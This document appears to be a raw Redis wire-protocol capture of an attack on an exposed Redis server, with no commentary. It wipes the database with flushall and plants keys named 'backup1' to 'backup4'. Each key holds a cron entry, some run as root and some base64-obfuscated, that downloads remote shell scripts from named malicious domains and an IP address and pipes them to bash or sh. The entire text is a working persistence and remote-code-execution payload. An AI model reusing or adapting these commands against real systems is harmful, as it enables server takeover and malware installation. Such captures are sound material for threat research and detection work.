*2
$6
SELECT
$1
0
*1
$8
flushall
*3
$3
set
$7
backup1
$103



*/2 * * * * echo Y2QxIGh0dHA6Ly9vcmFjbGUuenpocmVjZWl2ZS50b3AvYjJmNjI4L2Iuc2gK|base64 -d|bash|bash 


*3
$3
set
$7
backup2
$114



*/3 * * * * echo d2dldCAtcSAtTy0gaHR0cDovL29yYWNsZS56emhyZWNlaXZlLnRvcC9iMmY2MjgvYi5zaAo=|base64 -d|bash|bash


*3
$3
set
$7
backup3
$106



*/4 * * * * echo Y3VybCBodHRwOi8vb3JhY2xlLnp6aHJlY2VpdmUudG9wL2IyZjYyOC9iLnNoCg==|base64 -d|bash|bash


*1
$8
flushall
*3
$3
set
$7
backup1
$108



*/2 * * * * root echo Y2QxIGh0dHA6Ly9vcmFjbGUuenpocmVjZWl2ZS50b3AvYjJmNjI4L2Iuc2gK|base64 -d|bash|bash 


*3
$3
set
$7
backup2
$119



*/3 * * * * root echo d2dldCAtcSAtTy0gaHR0cDovL29yYWNsZS56emhyZWNlaXZlLnRvcC9iMmY2MjgvYi5zaAo=|base64 -d|bash|bash


*3
$3
set
$7
backup3
$111



*/4 * * * * root echo Y3VybCBodHRwOi8vb3JhY2xlLnp6aHJlY2VpdmUudG9wL2IyZjYyOC9iLnNoCg==|base64 -d|bash|bash


*1
$8
flushall
*3
$3
set
$7
backup1
$65



*/2 * * * * cd1 -fsSL http://en2an.top/cleanfda/init.sh | sh


*3
$3
set
$7
backup2
$67



*/3 * * * * wget -q -O- http://en2an.top/cleanfda/init.sh | sh


*3
$3
set
$7
backup3
$72



*/4 * * * * curl -fsSL http://195.242.111.238/cleanfda/init.sh | sh


*3
$3
set
$7
backup4
$72



*/5 * * * * wd1 -q -O- http://195.242.111.238/cleanfda/init.sh | sh


*1
$8
flushall
*3
$3
set
$7
backup1
$70



*/2 * * * * root cd1 -fsSL http://en2an.top/cleanfda/init.sh | sh


*3
$3
set
$7
backup2
$72



*/3 * * * * root wget -q -O- http://en2an.top/cleanfda/init.sh | sh


*3
$3
set
$7
backup3
$77



*/4 * * * * root curl -fsSL http://195.242.111.238/cleanfda/init.sh | sh


*3
$3
set
$7
backup4
$77



*/5 * * * * root wd1 -q -O- http://195.242.111.238/cleanfda/init.sh | sh


